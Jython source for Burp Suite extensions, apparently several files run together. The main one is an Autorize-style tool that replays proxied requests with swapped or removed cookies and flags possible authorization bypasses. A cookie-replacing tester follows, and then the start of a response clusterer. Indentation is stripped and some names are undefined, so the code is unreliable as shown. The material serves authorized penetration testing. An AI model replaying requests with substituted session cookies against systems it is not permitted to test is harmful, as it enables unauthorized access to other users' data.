self.EDListUnauth = JList(self.EDModelUnauth);
self.EDListUnauth.setBounds(80, 175, 300, 110)
self.EDListUnauth.setBorder(LineBorder(Color.BLACK))
self.EDAddUnauth = JButton("Add filter",actionPerformed=self.addEDFilterUnauth)
self.EDAddUnauth.setBounds(390, 85, 120, 30)
self.EDDelUnauth = JButton("Remove filter",actionPerformed=self.delEDFilterUnauth)
self.EDDelUnauth.setBounds(390, 210, 120, 30)
self.EDPnlUnauth = JPanel()
self.EDPnlUnauth.setLayout(None);
self.EDPnlUnauth.setBounds(0, 0, 1000, 1000);
self.EDPnlUnauth.add(EDLType)
self.EDPnlUnauth.add(self.EDTypeUnauth)
self.EDPnlUnauth.add(EDLContent)
self.EDPnlUnauth.add(self.EDTextUnauth)
self.EDPnlUnauth.add(self.EDAddUnauth)
self.EDPnlUnauth.add(self.EDDelUnauth)
self.EDPnlUnauth.add(EDLabelList)
self.EDPnlUnauth.add(self.EDListUnauth)
def initInterceptionFilters(self):
#
## init interception filters tab
#
IFStrings = ["Scope items only: (Content is not required)","URL Contains (simple string): ","URL Contains (regex): ","URL Not Contains (simple string): ","URL Not Contains (regex): "]
self.IFType = JComboBox(IFStrings)
self.IFType.setBounds(80, 10, 430, 30)
self.IFModel = DefaultListModel();
self.IFList = JList(self.IFModel);
self.IFList.setBounds(80, 175, 300, 110)
self.IFList.setBorder(LineBorder(Color.BLACK))
self.IFText = JTextArea("", 5, 30)
self.IFText.setBounds(80, 50, 300, 110)
IFLType = JLabel("Type:")
IFLType.setBounds(10, 10, 140, 30)
IFLContent = JLabel("Content:")
IFLContent.setBounds(10, 50, 140, 30)
IFLabelList = JLabel("Filter List:")
IFLabelList.setBounds(10, 165, 140, 30)
self.IFAdd = JButton("Add filter",actionPerformed=self.addIFFilter)
self.IFAdd.setBounds(390, 85, 120, 30)
self.IFDel = JButton("Remove filter",actionPerformed=self.delIFFilter)
self.IFDel.setBounds(390, 210, 120, 30)
self.filtersPnl = JPanel()
self.filtersPnl.setLayout(None);
self.filtersPnl.setBounds(0, 0, 1000, 1000);
self.filtersPnl.add(IFLType)
self.filtersPnl.add(self.IFType)
self.filtersPnl.add(IFLContent)
self.filtersPnl.add(self.IFText)
self.filtersPnl.add(self.IFAdd)
self.filtersPnl.add(self.IFDel)
self.filtersPnl.add(IFLabelList)
self.filtersPnl.add(self.IFList)
def initConfigurationTab(self):
#
## init configuration tab
#
self.prevent304 = JCheckBox("Prevent 304 Not Modified status code")
self.prevent304.setBounds(290, 25, 300, 30)
self.ignore304 = JCheckBox("Ignore 304/204 status code responses")
self.ignore304.setBounds(290, 5, 300, 30)
self.ignore304.setSelected(True)
self.autoScroll = JCheckBox("Auto Scroll")
#self.autoScroll.setBounds(290, 45, 140, 30)
self.autoScroll.setBounds(160, 40, 140, 30)
self.doUnauthorizedRequest = JCheckBox("Check unauthenticated")
self.doUnauthorizedRequest.setBounds(290, 45, 300, 30)
self.doUnauthorizedRequest.setSelected(True)
startLabel = JLabel("Authorization checks:")
startLabel.setBounds(10, 10, 140, 30)
self.startButton = JButton("Autorize is off",actionPerformed=self.startOrStop)
self.startButton.setBounds(160, 10, 120, 30)
self.startButton.setBackground(Color(255, 100, 91, 255))
self.clearButton = JButton("Clear List",actionPerformed=self.clearList)
self.clearButton.setBounds(10, 40, 100, 30)
self.replaceString = JTextArea("Cookie: Insert=injected; header=here;", 5, 30)
self.replaceString.setWrapStyleWord(True);
self.replaceString.setLineWrap(True)
self.replaceString.setBounds(10, 80, 470, 180)
self.filtersTabs = JTabbedPane()
self.filtersTabs.addTab("Enforcement Detector", self.EDPnl)
self.filtersTabs.addTab("Detector Unauthenticated", self.EDPnlUnauth)
self.filtersTabs.addTab("Interception Filters", self.filtersPnl)
self.filtersTabs.addTab("Export", self.exportPnl)
self.filtersTabs.setBounds(0, 280, 2000, 700)
self.pnl = JPanel()
self.pnl.setBounds(0, 0, 1000, 1000);
self.pnl.setLayout(None);
self.pnl.add(self.startButton)
self.pnl.add(self.clearButton)
self.pnl.add(self.replaceString)
self.pnl.add(startLabel)
self.pnl.add(self.autoScroll)
self.pnl.add(self.ignore304)
self.pnl.add(self.prevent304)
self.pnl.add(self.doUnauthorizedRequest)
self.pnl.add(self.filtersTabs)
def initTabs(self):
#
## init autorize tabs
#
self.logTable = Table(self)
self.logTable.setAutoCreateRowSorter(True)
tableWidth = self.logTable.getPreferredSize().width
self.logTable.getColumn("ID").setPreferredWidth(Math.round(tableWidth / 50 * 2))
self.logTable.getColumn("URL").setPreferredWidth(Math.round(tableWidth / 50 * 24))
self.logTable.getColumn("Orig. Length").setPreferredWidth(Math.round(tableWidth / 50 * 4))
self.logTable.getColumn("Modif. Length").setPreferredWidth(Math.round(tableWidth / 50 * 4))
self.logTable.getColumn("Unauth. Length").setPreferredWidth(Math.round(tableWidth / 50 * 4))
self.logTable.getColumn("Authorization Enforcement Status").setPreferredWidth(Math.round(tableWidth / 50 * 4))
self.logTable.getColumn("Authorization Unauth. Status").setPreferredWidth(Math.round(tableWidth / 50 * 4))
self._splitpane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
self._splitpane.setResizeWeight(1)
self.scrollPane = JScrollPane(self.logTable)
self._splitpane.setLeftComponent(self.scrollPane)
self.scrollPane.getVerticalScrollBar().addAdjustmentListener(autoScrollListener(self))
self.menuES0 = JCheckBoxMenuItem(self._enfocementStatuses[0],True)
self.menuES1 = JCheckBoxMenuItem(self._enfocementStatuses[1],True)
self.menuES2 = JCheckBoxMenuItem(self._enfocementStatuses[2],True)
self.menuES0.addItemListener(menuTableFilter(self))
self.menuES1.addItemListener(menuTableFilter(self))
self.menuES2.addItemListener(menuTableFilter(self))
copyURLitem = JMenuItem("Copy URL");
copyURLitem.addActionListener(copySelectedURL(self))
self.menu = JPopupMenu("Popup")
self.menu.add(copyURLitem)
self.menu.add(self.menuES0)
self.menu.add(self.menuES1)
self.menu.add(self.menuES2)
self.tabs = JTabbedPane()
self._requestViewer = self._callbacks.createMessageEditor(self, False)
self._responseViewer = self._callbacks.createMessageEditor(self, False)
self._originalrequestViewer = self._callbacks.createMessageEditor(self, False)
self._originalresponseViewer = self._callbacks.createMessageEditor(self, False)
self._unauthorizedrequestViewer = self._callbacks.createMessageEditor(self, False)
self._unauthorizedresponseViewer = self._callbacks.createMessageEditor(self, False)
self.tabs.addTab("Modified Request", self._requestViewer.getComponent())
self.tabs.addTab("Modified Response", self._responseViewer.getComponent())
self.tabs.addTab("Original Request", self._originalrequestViewer.getComponent())
self.tabs.addTab("Original Response", self._originalresponseViewer.getComponent())
self.tabs.addTab("Unauthenticated Request", self._unauthorizedrequestViewer.getComponent())
self.tabs.addTab("Unauthenticated Response", self._unauthorizedresponseViewer.getComponent())
self.tabs.addTab("Configuration", self.pnl)
self.tabs.setSelectedIndex(6)
self._splitpane.setRightComponent(self.tabs)
def initCallbacks(self):
#
## init callbacks
#
# customize our UI components
self._callbacks.customizeUiComponent(self._splitpane)
self._callbacks.customizeUiComponent(self.logTable)
self._callbacks.customizeUiComponent(self.scrollPane)
self._callbacks.customizeUiComponent(self.tabs)
self._callbacks.customizeUiComponent(self.filtersTabs)
self._callbacks.registerContextMenuFactory(self)
# add the custom tab to Burp's UI
self._callbacks.addSuiteTab(self)
#
## Events functions
#
def startOrStop(self, event):
if self.startButton.getText() == "Autorize is off":
self.startButton.setText("Autorize is on")
self.startButton.setBackground(Color.GREEN)
self.intercept = 1
self._callbacks.registerHttpListener(self)
else:
self.startButton.setText("Autorize is off")
self.startButton.setBackground(Color(255, 100, 91, 255))
self.intercept = 0
self._callbacks.removeHttpListener(self)
def addEDFilter(self, event):
typeName = self.EDType.getSelectedItem().split(":")[0]
self.EDModel.addElement(typeName + ": " + self.EDText.getText())
def delEDFilter(self, event):
index = self.EDList.getSelectedIndex();
if not index == -1:
self.EDModel.remove(index);
def addEDFilterUnauth(self, event):
typeName = self.EDTypeUnauth.getSelectedItem().split(":")[0]
self.EDModelUnauth.addElement(typeName + ": " + self.EDTextUnauth.getText())
def delEDFilterUnauth(self, event):
index = self.EDListUnauth.getSelectedIndex();
if not index == -1:
self.EDModelUnauth.remove(index);
def addIFFilter(self, event):
typeName = self.IFType.getSelectedItem().split(":")[0]
self.IFModel.addElement(typeName + ": " + self.IFText.getText())
def delIFFilter(self, event):
index = self.IFList.getSelectedIndex();
if not index == -1:
self.IFModel.remove(index);
def clearList(self, event):
self._lock.acquire()
oldSize = self._log.size()
self._log.clear()
self.fireTableRowsDeleted(0, oldSize - 1)
self._lock.release()
def export(self, event):
if self.exportType.getSelectedItem() == "HTML":
self.exportToHTML()
else:
self.exportToCSV()
def exportToCSV(self):
parentFrame = JFrame()
fileChooser = JFileChooser()
fileChooser.setSelectedFile(File("AutorizeReprort.csv"));
fileChooser.setDialogTitle("Save Autorize Report")
userSelection = fileChooser.showSaveDialog(parentFrame)
if userSelection == JFileChooser.APPROVE_OPTION:
fileToSave = fileChooser.getSelectedFile()
enforcementStatusFilter = self.exportES.getSelectedItem()
csvContent = "id\tURL\tOriginal length\tModified length\tUnauthorized length\tAuthorization Enforcement Status\tAuthorization Unauthenticated Status\n"
for i in range(0,self._log.size()):
if enforcementStatusFilter == "All Statuses":
csvContent += "%d\t%s\t%d\t%d\t%d\t%s\t%s\n" % (self._log.get(i)._id,self._log.get(i)._url, len(self._log.get(i)._originalrequestResponse.getResponse()) if self._log.get(i)._originalrequestResponse != None else 0, len(self._log.get(i)._requestResponse.getResponse()) if self._log.get(i)._requestResponse != None else 0, len(self._log.get(i)._unauthorizedRequestResponse.getResponse()) if self._log.get(i)._unauthorizedRequestResponse != None else 0, self._log.get(i)._enfocementStatus, self._log.get(i)._enfocementStatusUnauthorized)
else:
if (enforcementStatusFilter == self._log.get(i)._enfocementStatus) or (enforcementStatusFilter == self._log.get(i)._enfocementStatusUnauthorized):
csvContent += "%d\t%s\t%d\t%d\t%d\t%s\t%s\n" % (self._log.get(i)._id,self._log.get(i)._url, len(self._log.get(i)._originalrequestResponse.getResponse()) if self._log.get(i)._originalrequestResponse != None else 0, len(self._log.get(i)._requestResponse.getResponse()) if self._log.get(i)._requestResponse != None else 0, len(self._log.get(i)._unauthorizedRequestResponse.getResponse()) if self._log.get(i)._unauthorizedRequestResponse != None else 0, self._log.get(i)._enfocementStatus, self._log.get(i)._enfocementStatusUnauthorized)
f = open(fileToSave.getAbsolutePath(), 'w')
f.writelines(csvContent)
f.close()
def exportToHTML(self):
parentFrame = JFrame()
fileChooser = JFileChooser()
fileChooser.setSelectedFile(File("AutorizeReprort.html"));
fileChooser.setDialogTitle("Save Autorize Report")
userSelection = fileChooser.showSaveDialog(parentFrame)
if userSelection == JFileChooser.APPROVE_OPTION:
fileToSave = fileChooser.getSelectedFile()
enforcementStatusFilter = self.exportES.getSelectedItem()
htmlContent = """<html><title>Autorize Report by Barak Tawily</title>
<style>
.datagrid table { border-collapse: collapse; text-align: left; width: 100%; }
.datagrid {font: normal 12px/150% Arial, Helvetica, sans-serif; background: #fff; overflow: hidden; border: 1px solid #006699; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; }
.datagrid table td, .datagrid table th { padding: 3px 10px; }
.datagrid table thead th {background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #006699), color-stop(1, #00557F) );background:-moz-linear-gradient( center top, #006699 5%, #00557F 100% );filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#006699', endColorstr='#00557F');background-color:#006699; color:#FFFFFF; font-size: 15px; font-weight: bold; border-left: 1px solid #0070A8; } .datagrid table thead th:first-child { border: none; }.datagrid table tbody td { color: #00496B; border-left: 1px solid #E1EEF4;font-size: 12px;font-weight: normal; }.datagrid table tbody .alt td { background: #E1EEF4; color: #00496B; }.datagrid table tbody td:first-child { border-left: none; }.datagrid table tbody tr:last-child td { border-bottom: none; }.datagrid table tfoot td div { border-top: 1px solid #006699;background: #E1EEF4;} .datagrid table tfoot td { padding: 0; font-size: 12px } .datagrid table tfoot td div{ padding: 2px; }.datagrid table tfoot td ul { margin: 0; padding:0; list-style: none; text-align: right; }.datagrid table tfoot li { display: inline; }.datagrid table tfoot li a { text-decoration: none; display: inline-block; padding: 2px 8px; margin: 1px;color: #FFFFFF;border: 1px solid #006699;-webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #006699), color-stop(1, #00557F) );background:-moz-linear-gradient( center top, #006699 5%, #00557F 100% );filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#006699', endColorstr='#00557F');background-color:#006699; }.datagrid table tfoot ul.active, .datagrid table tfoot ul a:hover { text-decoration: none;border-color: #006699; color: #FFFFFF; background: none; background-color:#00557F;}div.dhtmlx_window_active, div.dhx_modal_cover_dv { position: fixed !important; }
table {
width: 100%;
table-layout: fixed;
}
td {
border: 1px solid #35f;
overflow: hidden;
text-overflow: ellipsis;
}
td.a {
width: 13%;
white-space: nowrap;
}
td.b {
width: 9%;
word-wrap: break-word;
}
</style>
<body>
<h1>Autorize Report<h1>
<div class="datagrid"><table>
<thead><tr><th width=\"3%\">ID</th><th width=\"48%\">URL</th><th width=\"9%\">Original length</th><th width=\"9%\">Modified length</th><th width=\"9%\">Unauthorized length</th><th width=\"11%\">Authorization Enforcement Status</th><th width=\"11%\">Authorization Unauthenticated Status</th></tr></thead>
<tbody>"""
for i in range(0,self._log.size()):
color_modified = ""
if self._log.get(i)._enfocementStatus == self._enfocementStatuses[0]:
color_modified = "red"
if self._log.get(i)._enfocementStatus == self._enfocementStatuses[1]:
color_modified = "yellow"
if self._log.get(i)._enfocementStatus == self._enfocementStatuses[2]:
color_modified = "LawnGreen"
color_unauthorized = ""
if self._log.get(i)._enfocementStatusUnauthorized == self._enfocementStatuses[0]:
color_unauthorized = "red"
if self._log.get(i)._enfocementStatusUnauthorized == self._enfocementStatuses[1]:
color_unauthorized = "yellow"
if self._log.get(i)._enfocementStatusUnauthorized == self._enfocementStatuses[2]:
color_unauthorized = "LawnGreen"
if enforcementStatusFilter == "All Statuses":
htmlContent += "<tr><td>%d</td><td><a href=\"%s\">%s</a></td><td>%d</td><td>%d</td><td>%d</td><td bgcolor=\"%s\">%s</td><td bgcolor=\"%s\">%s</td></tr>" % (self._log.get(i)._id,self._log.get(i)._url,self._log.get(i)._url, len(self._log.get(i)._originalrequestResponse.getResponse()) if self._log.get(i)._originalrequestResponse != None else 0, len(self._log.get(i)._requestResponse.getResponse()) if self._log.get(i)._requestResponse != None else 0, len(self._log.get(i)._unauthorizedRequestResponse.getResponse()) if self._log.get(i)._unauthorizedRequestResponse != None else 0, color_modified, self._log.get(i)._enfocementStatus, color_unauthorized, self._log.get(i)._enfocementStatusUnauthorized)
else:
if (enforcementStatusFilter == self._log.get(i)._enfocementStatus) or (enforcementStatusFilter == self._log.get(i)._enfocementStatusUnauthorized):
htmlContent += "<tr><td>%d</td><td><a href=\"%s\">%s</a></td><td>%d</td><td>%d</td><td>%d</td><td bgcolor=\"%s\">%s</td><td bgcolor=\"%s\">%s</td></tr>" % (self._log.get(i)._id,self._log.get(i)._url,self._log.get(i)._url, len(self._log.get(i)._originalrequestResponse.getResponse()) if self._log.get(i)._originalrequestResponse != None else 0, len(self._log.get(i)._requestResponse.getResponse()) if self._log.get(i)._requestResponse != None else 0, len(self._log.get(i)._unauthorizedRequestResponse.getResponse()) if self._log.get(i)._unauthorizedRequestResponse != None else 0, color_modified, self._log.get(i)._enfocementStatus, color_unauthorized, self._log.get(i)._enfocementStatusUnauthorized)
htmlContent += "</tbody></table></div></body></html>"
f = open(fileToSave.getAbsolutePath(), 'w')
f.writelines(htmlContent)
f.close()
#
# implement IContextMenuFactory
#
def createMenuItems(self, invocation):
responses = invocation.getSelectedMessages();
if responses > 0:
ret = LinkedList()
requestMenuItem = JMenuItem("Send request to Autorize");
cookieMenuItem = JMenuItem("Send cookie to Autorize");
requestMenuItem.addActionListener(handleMenuItems(self,responses[0], "request"))
cookieMenuItem.addActionListener(handleMenuItems(self, responses[0], "cookie"))
ret.add(requestMenuItem);
ret.add(cookieMenuItem);
return(ret);
return null;
#
# implement ITab
#
def getTabCaption(self):
return "Autorize"
def getUiComponent(self):
return self._splitpane
#
# extend AbstractTableModel
#
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 7
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "ID"
if columnIndex == 1:
return "URL"
if columnIndex == 2:
return "Orig. Length"
if columnIndex == 3:
return "Modif. Length"
if columnIndex == 4:
return "Unauth. Length"
if columnIndex == 5:
return "Authorization Enforcement Status"
if columnIndex == 6:
return "Authorization Unauth. Status"
return ""
def getColumnClass(self, columnIndex):
if columnIndex == 0:
return Integer
if columnIndex == 1:
return String
if columnIndex == 2:
return Integer
if columnIndex == 3:
return Integer
if columnIndex == 4:
return Integer
if columnIndex == 5:
return String
if columnIndex == 6:
return String
return String
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return logEntry._id
if columnIndex == 1:
return logEntry._url.toString()
if columnIndex == 2:
return len(logEntry._originalrequestResponse.getResponse())
if columnIndex == 3:
return len(logEntry._requestResponse.getResponse())
if columnIndex == 4:
if logEntry._unauthorizedRequestResponse != None:
return len(logEntry._unauthorizedRequestResponse.getResponse())
else:
#return "-"
return 0
if columnIndex == 5:
return logEntry._enfocementStatus
if columnIndex == 6:
return logEntry._enfocementStatusUnauthorized
return ""
#
# implement IMessageEditorController
# this allows our request/response viewers to obtain details about the messages being displayed
#
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
#
# implement IHttpListener
#
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
#if (self.intercept == 1) and (toolFlag != self._callbacks.TOOL_EXTENDER):
if (self.intercept == 1) and (toolFlag == self._callbacks.TOOL_PROXY):
if self.prevent304.isSelected():
if messageIsRequest:
requestHeaders = list(self._helpers.analyzeRequest(messageInfo).getHeaders())
newHeaders = list()
found = 0
for header in requestHeaders:
if not "If-None-Match:" in header and not "If-Modified-Since:" in header:
newHeaders.append(header)
found = 1
if found == 1:
requestInfo = self._helpers.analyzeRequest(messageInfo)
bodyBytes = messageInfo.getRequest()[requestInfo.getBodyOffset():]
bodyStr = self._helpers.bytesToString(bodyBytes)
messageInfo.setRequest(self._helpers.buildHttpMessage(newHeaders, bodyStr))
if not messageIsRequest:
if not self.replaceString.getText() in self._helpers.analyzeRequest(messageInfo).getHeaders():
if self.ignore304.isSelected():
firstHeader = self._helpers.analyzeResponse(messageInfo.getResponse()).getHeaders()[0]
if "304" in firstHeader or "204" in firstHeader:
return
if self.IFList.getModel().getSize() == 0:
self.checkAuthorization(messageInfo,self._helpers.analyzeResponse(messageInfo.getResponse()).getHeaders(),self.doUnauthorizedRequest.isSelected())
else:
urlString = str(self._helpers.analyzeRequest(messageInfo).getUrl())
do_the_check = 1
for i in range(0,self.IFList.getModel().getSize()):
if self.IFList.getModel().getElementAt(i).split(":")[0] == "Scope items only":
currentURL = URL(urlString)
if not self._callbacks.isInScope(currentURL):
do_the_check = 0
if self.IFList.getModel().getElementAt(i).split(":")[0] == "URL Contains (simple string)":
if self.IFList.getModel().getElementAt(i)[30:] not in urlString:
do_the_check = 0
if self.IFList.getModel().getElementAt(i).split(":")[0] == "URL Contains (regex)":
regex_string = self.IFList.getModel().getElementAt(i)[22:]
p = re.compile(regex_string, re.IGNORECASE)
if not p.search(urlString):
do_the_check = 0
if self.IFList.getModel().getElementAt(i).split(":")[0] == "URL Not Contains (simple string)":
if self.IFList.getModel().getElementAt(i)[34:] in urlString:
do_the_check = 0
if self.IFList.getModel().getElementAt(i).split(":")[0] == "URL Not Contains (regex)":
regex_string = self.IFList.getModel().getElementAt(i)[26:]
p = re.compile(regex_string, re.IGNORECASE)
if p.search(urlString):
do_the_check = 0
if do_the_check:
self.checkAuthorization(messageInfo,self._helpers.analyzeResponse(messageInfo.getResponse()).getHeaders(),self.doUnauthorizedRequest.isSelected())
return
def sendRequestToAutorizeWork(self,messageInfo):
if messageInfo.getResponse() == None:
message = self.makeMessage(messageInfo,False,False)
requestResponse = self.makeRequest(messageInfo, message)
self.checkAuthorization(requestResponse,self._helpers.analyzeResponse(requestResponse.getResponse()).getHeaders(),self.doUnauthorizedRequest.isSelected())
else:
self.checkAuthorization(messageInfo,self._helpers.analyzeResponse(messageInfo.getResponse()).getHeaders(),self.doUnauthorizedRequest.isSelected())
def makeRequest(self, messageInfo, message):
requestURL = self._helpers.analyzeRequest(messageInfo).getUrl()
return self._callbacks.makeHttpRequest(self._helpers.buildHttpService(str(requestURL.getHost()), int(requestURL.getPort()), requestURL.getProtocol() == "https"), message)
def makeMessage(self, messageInfo, removeOrNot, authorizeOrNot):
requestInfo = self._helpers.analyzeRequest(messageInfo)
headers = requestInfo.getHeaders()
if removeOrNot:
headers = list(headers)
removeHeaders = ArrayList()
removeHeaders.add(self.replaceString.getText()[0:self.replaceString.getText().index(":")])
for header in headers[:]:
for removeHeader in removeHeaders:
if removeHeader in header:
headers.remove(header)
if authorizeOrNot:
headers.append(self.replaceString.getText())
msgBody = messageInfo.getRequest()[requestInfo.getBodyOffset():]
return self._helpers.buildHttpMessage(headers, msgBody)
def checkBypass(self,oldStatusCode,newStatusCode,oldContentLen,newContentLen,filters,requestResponse):
analyzedResponse = self._helpers.analyzeResponse(requestResponse.getResponse())
impression = ""
if oldStatusCode == newStatusCode:
if oldContentLen == newContentLen:
impression = self._enfocementStatuses[0]
else:
auth_enforced = 1
for filter in filters:
if str(filter).startswith("Headers (simple string): "):
if not(filter[25:] in self._helpers.bytesToString(requestResponse.getResponse()[0:analyzedResponse.getBodyOffset()])):
auth_enforced = 0
if str(filter).startswith("Headers (regex): "):
regex_string = filter[17:]
p = re.compile(regex_string, re.IGNORECASE)
if not p.search(self._helpers.bytesToString(requestResponse.getResponse()[0:analyzedResponse.getBodyOffset()])):
auth_enforced = 0
if str(filter).startswith("Body (simple string): "):
if not(filter[22:] in self._helpers.bytesToString(requestResponse.getResponse()[analyzedResponse.getBodyOffset():])):
auth_enforced = 0
if str(filter).startswith("Body (regex): "):
regex_string = filter[14:]
p = re.compile(regex_string, re.IGNORECASE)
if not p.search(self._helpers.bytesToString(requestResponse.getResponse()[analyzedResponse.getBodyOffset():])):
auth_enforced = 0
if str(filter).startswith("Full request (simple string): "):
if not(filter[30:] in self._helpers.bytesToString(requestResponse.getResponse())):
auth_enforced = 0
if str(filter).startswith("Full request (regex): "):
regex_string = filter[22:]
p = re.compile(regex_string, re.IGNORECASE)
if not p.search(self._helpers.bytesToString(requestResponse.getResponse())):
auth_enforced = 0
if str(filter).startswith("Content-Length: "):
if newContentLen != filter:
auth_enforced = 0
if auth_enforced:
impression = self._enfocementStatuses[2]
else:
impression = self._enfocementStatuses[1]
else:
impression = self._enfocementStatuses[2]
return impression
def checkAuthorization(self, messageInfo, originalHeaders, checkUnauthorized):
message = self.makeMessage(messageInfo,True,True)
requestResponse = self.makeRequest(messageInfo, message)
analyzedResponse = self._helpers.analyzeResponse(requestResponse.getResponse())
oldStatusCode = originalHeaders[0]
newStatusCode = analyzedResponse.getHeaders()[0]
oldContentLen = self.getContentLength(originalHeaders)
newContentLen = self.getContentLength(analyzedResponse.getHeaders())
# Check unauthorized request
if checkUnauthorized:
messageUnauthorized = self.makeMessage(messageInfo,True,False)
requestResponseUnauthorized = self.makeRequest(messageInfo, messageUnauthorized)
analyzedResponseUnauthorized = self._helpers.analyzeResponse(requestResponseUnauthorized.getResponse())
statusCodeUnauthorized = analyzedResponseUnauthorized.getHeaders()[0]
contentLenUnauthorized = self.getContentLength(analyzedResponseUnauthorized.getHeaders())
EDFilters = self.EDModel.toArray()
impression = self.checkBypass(oldStatusCode,newStatusCode,oldContentLen,newContentLen,EDFilters,requestResponse)
if checkUnauthorized:
EDFiltersUnauth = self.EDModelUnauth.toArray()
impressionUnauthorized = self.checkBypass(oldStatusCode,statusCodeUnauthorized,oldContentLen,contentLenUnauthorized,EDFiltersUnauth,requestResponseUnauthorized)
self._lock.acquire()
row = self._log.size()
if checkUnauthorized:
self._log.add(LogEntry(self.currentRequestNumber,self._callbacks.saveBuffersToTempFiles(requestResponse), self._helpers.analyzeRequest(requestResponse).getUrl(),messageInfo,impression,self._callbacks.saveBuffersToTempFiles(requestResponseUnauthorized),impressionUnauthorized)) # same requests not include again.
else:
self._log.add(LogEntry(self.currentRequestNumber,self._callbacks.saveBuffersToTempFiles(requestResponse), self._helpers.analyzeRequest(requestResponse).getUrl(),messageInfo,impression,None,"Disabled")) # same requests not include again.
self.fireTableRowsInserted(row, row)
self.currentRequestNumber = self.currentRequestNumber + 1
self._lock.release()
def getContentLength(self, analyzedResponseHeaders):
for header in analyzedResponseHeaders:
if "Content-Length:" in header:
return header;
return "null"
def getCookieFromMessage(self, messageInfo):
headers = list(self._helpers.analyzeRequest(messageInfo.getRequest()).getHeaders())
for header in headers:
if "Cookie:" in header:
return header
return None
class BurpExtender(IBurpExtender, ITab, IHttpListener, IMessageEditorController, AbstractTableModel):
#
# implement IBurpExtender
#
def registerExtenderCallbacks(self, callbacks):
# keep a reference to our callbacks object
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("Test Auth | Cookie Repalce ")
# create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
# main split pane
self._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
# user jpanel add compenents
self._panel=JPanel()
self._panel.setLayout(BorderLayout())
subpanel=JPanel()
button =JButton("OK")
subpanel.add(button)
self._panel.add(subpanel,BorderLayout.NORTH)
# table of log entries
logTable = Table(self)
scrollPane = JScrollPane(logTable)
self._splitpane.setLeftComponent(scrollPane)
self._panel.add(self._splitpane,BorderLayout.CENTER)
# tabs with request/response viewers
tabs = JTabbedPane()
self._requestViewer = callbacks.createMessageEditor(self, False)
self._responseViewer = callbacks.createMessageEditor(self, False)
tabs.addTab("Request", self._requestViewer.getComponent())
tabs.addTab("Response", self._responseViewer.getComponent())
self._splitpane.setRightComponent(tabs)
# customize our UI components
callbacks.customizeUiComponent(self._splitpane)
# callbacks.customizeUiComponent(logTable)
# callbacks.customizeUiComponent(scrollPane)
# callbacks.customizeUiComponent(tabs)
callbacks.customizeUiComponent(self._panel)
callbacks.customizeUiComponent(subpanel)
# callbacks.customizeUiComponent(button)
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# register ourselves as an HTTP listener
callbacks.registerHttpListener(self)
return
#
# implement ITab
#
def getTabCaption(self):
return "Auth Test"
def getUiComponent(self):
return self._panel
#
# implement IHttpListener
#
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
# only process requests
if messageIsRequest:
return
if messageInfo.getHttpService().getHost()!=host:
return
if toolFlag==4:
bytesRequest=messageInfo.getRequest()
requestInfo=self._helpers.analyzeRequest(messageInfo.getHttpService(),bytesRequest)
bytesRequestBody=bytesRequest[requestInfo.getBodyOffset():]
file = requestInfo.getUrl().getFile()
if file in extract_file or re.match(reobj,file):
return
path=requestInfo.getUrl().getPath()
if '.' in path:
ext = path.split('.')[-1]
else:
ext = ''
if ext in ["jpg","png","gif","ico","mp4","js","css","map","html"]:
return
headers=requestInfo.getHeaders()
newHeaders=[]
for header in headers:
if header.startswith("Cookie:"):
newHeaders.append(Cookie)
else:
newHeaders.append(header)
bytesNewRequest=self._helpers.buildHttpMessage(newHeaders,bytesRequestBody)
newRequestResponse=self._callbacks.makeHttpRequest(messageInfo.getHttpService(),bytesNewRequest)
responseInfo=self._helpers.analyzeResponse(newRequestResponse.getResponse())
# if abs(len(newRequestResponse.getResponse())-len(messageInfo.getResponse()))>500:
# return
# create a new log entry with the message details
self._lock.acquire()
row = self._log.size()
log_entry=LogEntry(toolFlag,
requestInfo.getMethod(),
self._callbacks.saveBuffersToTempFiles(newRequestResponse),
responseInfo.getStatusCode(),
self._helpers.analyzeRequest(messageInfo).getUrl())
self._log.add(log_entry)
self.fireTableRowsInserted(row, row)
self._lock.release()
#
# extend AbstractTableModel
#
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 4
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "Tool"
if columnIndex == 1:
return "Method"
if columnIndex == 2:
return "Status"
if columnIndex == 3:
return "URL"
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return self._callbacks.getToolName(logEntry._tool)
if columnIndex == 1:
return logEntry._method
if columnIndex == 2:
return logEntry._status
if columnIndex == 3:
return logEntry._url.toString()
return ""
#
# implement IMessageEditorController
# this allows our request/response viewers to obtain details about the messages being displayed
#
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
class BurpExtender(IBurpExtender, ITab, IHttpListener,
IMessageEditorController, AbstractTableModel,
ActionListener, DocumentListener):
#
# implement IBurpExtender
#
def registerExtenderCallbacks(self, callbacks):
# keep a reference to our callbacks object
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("Response Clusterer")
# create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
# main split pane
self._main_jtabedpane = JTabbedPane()
# The split pane with the log and request/respponse details
self._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
# table of log entries
logTable = Table(self)
